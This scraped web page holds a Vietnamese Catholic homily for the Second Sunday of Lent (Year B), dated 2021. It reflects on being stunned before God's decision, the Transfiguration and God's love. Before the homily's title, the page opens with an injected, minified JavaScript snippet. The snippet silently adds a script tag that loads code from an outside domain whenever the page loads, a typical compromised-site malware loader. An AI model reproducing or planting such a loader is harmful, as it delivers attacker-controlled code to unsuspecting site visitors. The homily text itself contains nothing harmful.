;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); “SỮNG SỜ” – Xitô PS

“SỮNG SỜ”

“SỮNG SỜ”

MÙA CHAY – TUẦN II – CHÚA NHẬT (B)

(St 22, 1-2.9a.10-13.15-18 / Rm 8, 31b-34 / Mc 9, 2-10)

Trong cuộc sống, nhiều lần chúng ta đã trải nghiệm những cảm xúc rất mạnh. Những cảm xúc đó khởi phát từ những biến cố hay sự cố bên ngoài và gieo vào tâm trí chúng ta để tạo nên những tiếng dội mạnh. Một trong những cảm xúc mạnh, đó là “sững sờ”. Sững sờ là “ngẩn ngơ, yên lặng vì ngạc nhiên quá” (NGHIALAGI.NET).

Hơn cả một cảm xúc mau qua, sững sờ còn là một trạng thái tâm hồn trước những điều vượt quá trí hiểu và trí tưởng tượng. Trạng thái này, một cách nào đó, giúp hình thành một lối suy tư và hành động mới.

Ba bài đọc Kinh Thánh trong chúa nhật thứ hai Mùa Chay năm B, diễn tả cho chúng ta ba thứ sửng sờ hay đúng hơn, sững sờ trong ba tình huống khác nhau. Tôi xin được chia sẻ với anh chị em về “sững sờ”.

1. SỮNG SỜ VÌ MỘT QUYẾT ĐỊNH

Nơi bài đọc thứ nhất trích sách Sáng Thế, tác giả tường thuật lại việc ông Áp-ra-ham được Thiên Chúa ra lệnh ra đi hiến tế con mình là I-sa-ác. Và những chi tiết được thuật lại khá tỉ mỉ: từ việc ông âm thầm đáp lại tiếng Thiên Chúa, đến việc ông cùng người con duy nhất của ông lên đường đến nơi Thiên Chúa sẽ chỉ cho để thực hiện việc sát tế này, rồi cuối cùng sự việc xảy ra không như ý định của khởi điểm.

Chúng ta không dừng lại các chi tiết để phân tích, nhưng sẽ cố gắng đặt mình vào hoàn cảnh của ông Áp-ra-ham để khám phá những gì có thể đã xảy ra trong nội tâm của ông. Có một điều rõ ràng là khi viết về Tổ Phụ Áp-ra-ham, tác giả không cho thấy những cảm xúc của ông, như thể ông là một con người xác tín, luôn vượt thắng chính mình để đáp lại tiếng gọi của Thiên Chúa. Ông im lặng ra đi và thực hiện điều được yêu cầu. Nhưng nội tâm của ông có thinh lặng không? Chúng ta cùng nhau khám phá nội tâm của ông với một chút tưởng tượng.

Khi Thiên Chúa gọi ông và nói: “Hãy đem con của ngươi, đứa con một yêu dấu của ngươi là I-sa-ác, hãy đi đến xứ Mô-ri-gia mà dâng nó làm lễ toàn thiêu ở đấy, trên một ngọn núi Ta sẽ chỉ cho.” Nghe những lời này từ miệng Thiên Chúa, ông Áp-ra-ham cảm thấy gì? Là con người, ông phải cảm xúc và xúc động mạnh, sâu trong tâm hồn. Tôi thiết nghĩ rằng ông sững sờ. Trước khi suy nghĩ về điều Thiên Chúa ra lệnh phải thực hiện và trước khi đức tin vào cuộc, ông đã cảm xúc mạnh, “sững sờ”. Tất cả quá khứ của lời Thiên Chúa hứa đã được hiện thực, nay chấm dứt với cái hiện tại nghiệt ngã. Và bao nhiêu yếu tố tạo nên sững sờ.

Tôi nghĩ rằng trong hành trình mấy ngày trên con đường đến ngọn núi trong vùng Mô-ri-gia, ông Áp-ra-ham không hết sững sờ. Sự thinh lặng của ông diễn tả tâm trạng sững sờ. Chúng ta không phân tích thêm diễn tiến của sự việc. Nhưng vào cuối diễn tiến, một điều làm ông cũng không kém sững sờ, đó là Thiên Chúa lại can thiệp một cách ông không ngờ, không nghĩ tới. Ông cứ thực hiện như kịch bản ông soạn ra với cái kết là con ông bị giết chết để hiến tế cho Thiên Chúa làm của lễ toàn thiêu.

Ông Áp-ra-ham sững sờ vì một quyết định của Thiên Chúa và ông thực hiện quyết định đó. Ông sững sờ vì Thiên Chúa lại quyết định can thiệp vào giây phút chót của bi kịch, tạo nên một cái kết có hậu, với lời chúc lành: “Ta lấy chính danh Ta mà thề: bởi vì ngươi đã làm điều đó, đã không tiếc con của ngươi, con một của ngươi, nên Ta sẽ thi ân giáng phúc cho ngươi”.

Ai trong chúng ta cũng đã từng sững sờ trước một quyết định nào đó, những quyết định làm choáng váng. Nhưng cách hành xử của Tổ Phụ Áp-ra-ham hé lộ cho chúng ta thấy cái sững sờ lại dẫn đến cách thức đáp ứng lại mời gọi của Thiên Chúa, như một phản ứng trước cách hành xử của Thiên Chúa. Và dám tin rằng Thiên Chúa sẽ mang đến một kết cục cũng không kém gây nên sững sờ.

 2. SỮNG SỜ VÌ MỘT BIẾN CỐ

Bài Tin Mừng theo thánh Mác-cô diễn đạt cho chúng ta một loại sững sờ khác. Thánh sử trình thuật cuộc biến hình của Chúa Giêsu trước mắt ba môn đệ Phê-rô, Gia-cô-bê và Gio-an. Những chi tiết của cuộc biến hình này, ai trong chúng ta cũng đã nắm vững. Tôi muốn dừng lại nơi tâm hồn của ba môn đệ trên, với một chút tưởng tượng, để khám phá ra tâm trạng của các ông khi đó. Trước sự biến đổi hình dạng một cách kỳ diệu và vượt quá mọi suy tưởng của các ông, chắc chắn các ông cũng rất bị choáng ngợp trước vẻ uy linh của Thầy mình. Choáng ngợp tạo nên tâm trạng sửng sờ nơi các ông. Ông Phê-rô, như đại diện cho hai môn đệ kia, đã thốt lên: “Thưa thầy, chúng con ở đây, thật là hay! Chúng con xin dựng ba cái lều, một cho Thầy, một cho ông Mô-sê, và một cho ông Ê-li-a.” Thánh sử Mác-cô chú thích thêm: “Thật ra, ông không biết phải nói gì, vì các ông kinh hoàng.” Đây là tâm trạng của các môn đệ lúc đó. Rất thật. Vì như chúng ta biết, thánh Mác-cô đã viết Tin Mừng dựa vào kinh nghiệm và lời rao giảng của thánh Phê-rô. Các ông kinh hoàng, nghĩa là hoàn toàn sững sờ.

Các ông sững sờ trước một biến cố xảy ra trước mắt các ông và những gì các ông nghe được từ đám mây: “Đây là Con Ta yêu dấu, hãy vâng nghe lời Người.” Sững sờ trước một biến cố mang tính mầu nhiệm. Và chính khi sững sờ trước biến cố mầu nhiệm của Thầy mình, các ông đã cảm nghiệm thấy niềm vui sướng, hạnh phúc ngất ngây: “Ở đây thật là hay!”

Tâm trạng sững sờ của các môn đệ trước biến cố mầu nhiệm của Chúa Giêsu, của Thiên Chúa gợi cho chúng ta sống cảm xúc và tâm trạng sững sờ của chúng ta trước mầu nhiệm của Thiên Chúa. Mầu nhiệm của Thiên Chúa làm chúng ta ngây ngất khi chiêm ngưỡng, làm sững sờ như thể đụng chạm được Đấng Thánh. Đây là cảm nghiệm nuôi sống đời kitô hữu của chúng ta và giúp chúng ta hiểu được thập giá gây sững sờ như chính các môn đệ từ trên núi xuống không ngừng bàn hỏi và suy nghĩ “từ cõi chết sống lại nghĩa là gì”.

3. SỮNG SỜ VÌ MỘT TÌNH YÊU

Trong bài đọc thứ hai, trích thư thánh Phao-lô gửi giáo đoàn Rô-ma, thánh nhân như trong tâm trạng ngây ngất khi tuyên xưng: “Có Thiên Chúa bênh đỡ chúng ta, ai còn chống lại được chúng ta? Đến như chính Con Một, Thiên Chúa cũng chẳng tiếc, nhưng đã trao nộp vì hết thảy chúng ta. Một khi đã ban người Con đó, lẽ nào Thiên Chúa lại chẳng rộng ban tất cả cho chúng ta?”

Chúng ta cần đọc lại từng chữ, từng mệnh đề để hiểu được điều thánh Phao-lô khẳng định. Thánh nhân đã nói đến tình yêu thương to lớn Thiên Chúa dành cho chúng ta, lớn đến nỗi Thiên Chúa Cha không tiếc gì cho chúng ta, ngay Con Một của Người, Người cũng đã ban cho, và cùng với Người Con đó, Thiên Chúa ban tất cả cho chúng ta. Chúng ta tưởng tượng một chút về cung giọng của thánh Phao-lô khi tuyên xưng điều đó, khi tay ngài viết lên những dòng chữ này. Tâm trạng ngài thế nào? Rung cảm thật mạnh và sững sờ. Sững sờ trước một Thiên Chúa quá ư hào phóng đối với con người. đây là cái sững sờ chân thật của con tim rung cảm trước một Tình Yêu (viết bằng chữ hoa) quá sức suy nghĩ và tưởng tượng của loài người.

Trước tình yêu của Thiên Chúa, chúng ta đã có lần nào sững sờ chưa? Có lẽ chúng ta quan niệm Thiên Chúa của chúng ta và tình yêu của Người theo kiểu “nhỏ giọt”. Chúa ban nhỏ giọt, từng chút chút, và vì thế, chúng ta cũng xin Chúa kiểu nhỏ giọt và những điều nhỏ mọn. Trong khi Thiên Chúa ban cho chúng ta Con Một của Người và những gì cần thiết, đầy đủ cho chúng ta cùng với Con của Người. Chúng ta không dám tin và vì thế cũng không sững sờ. Có khi nào, chiêm ngắm hang đá dịp lễ Giáng Sinh, hay hướng nhìn lên Thánh Giá Chúa Giêsu, hoặc lặng thinh trước Thánh Thể, chúng ta đã cảm thấy tận sâu thẳm mình niềm sững sờ trước Tình yêu?

Sững sờ trước một tình yêu vượt quá trí khôn, vượt ngàn tưởng tượng, mời gọi chúng ta đáp trả với trọn tình yêu với Đấng đã “chết, hơn nữa, đã sống lại, và đang ngự bên hữu Thiên Chúa mà chuyển cầu cho chúng ta.”

Mùa chay mời gọi chúng ta nhạy bén trước Thiên Chúa và đường lối của Người. Trở về với lòng mình, với căn nhà nội tâm của mình, để làm sống động cái sững sờ trước đường lối của Thiên Chúa, trước mầu nhiệm và tình yêu của Người. Sững sờ mở ra cho chúng ta những lối tu duy và cách hành xử mới.

Duyên Thập Tự Lê Văn Đoàn – 28/2/2021

You May Also Like

Trả lời

X